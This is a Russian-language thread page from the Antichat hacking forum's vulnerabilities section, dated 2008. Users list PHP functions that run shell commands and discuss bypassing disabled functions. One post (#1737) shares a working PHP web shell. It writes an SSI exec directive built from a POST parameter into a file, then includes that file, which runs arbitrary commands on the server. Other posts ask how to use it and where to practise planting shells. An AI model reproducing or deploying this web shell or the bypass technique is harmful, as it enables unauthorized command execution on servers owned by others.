HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1731  
Старый 22.04.2008, 11:42
Lesnoy_chelovek
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами: 10226273

Репутация: 370
По умолчанию

Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).
 
Ответить с цитированием

  #1732  
Старый 22.04.2008, 11:45
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз

Ershik, ещё есть passthru, exec, shell_exec, popen

Последний раз редактировалось Спайдер; 22.04.2008 в 11:49..
 
Ответить с цитированием

  #1733  
Старый 22.04.2008, 11:47
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
Сообщение от Спайдер  
обратный апостроф это в перле =\
print `uname`

Ershik, ещё есть passthru, exec, shell_exec, popen
врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php

обратные ковычки равноценны shell_exec()

ещё есть pcntl_exec и proc_open
__________________
 
Ответить с цитированием

  #1734  
Старый 22.04.2008, 11:49
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)
 
Ответить с цитированием

  #1735  
Старый 22.04.2008, 12:13
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Все нужно по типу:
Цитата:
<?
system(proc_open);
?>
так и делал. Все запрещено..
 
Ответить с цитированием

  #1736  
Старый 22.04.2008, 14:54
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

омг
 
Ответить с цитированием

  #1737  
Старый 22.04.2008, 16:44
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

если можешь менять файл можешь через ccи попытатся
https://forum.antichat.ru/showpost.p...32&postcount=9

я написал себе этот маленкий шелл для этого
PHP код:
<?php
if ($handle = @fopen("./a.shtml"'w')) 
{ @
fwrite($handle'<!--#exec cmd="'.$_POST['a'].'"-->'); }
echo 
'<form name="a" method="post" action="">
<textarea name="textarea" id="textarea" cols="121" rows="24"> '
;
@include(
"http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
echo 
' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
?>

Последний раз редактировалось nicusor; 22.04.2008 в 17:03..
 
Ответить с цитированием

  #1738  
Старый 22.04.2008, 19:14
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
 
Ответить с цитированием

  #1739  
Старый 22.04.2008, 21:59
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
 
Ответить с цитированием

  #1740  
Старый 22.04.2008, 22:14
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Народ, знает кто, где мона потренирвоаться с заливкой шеллов ? :Р
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.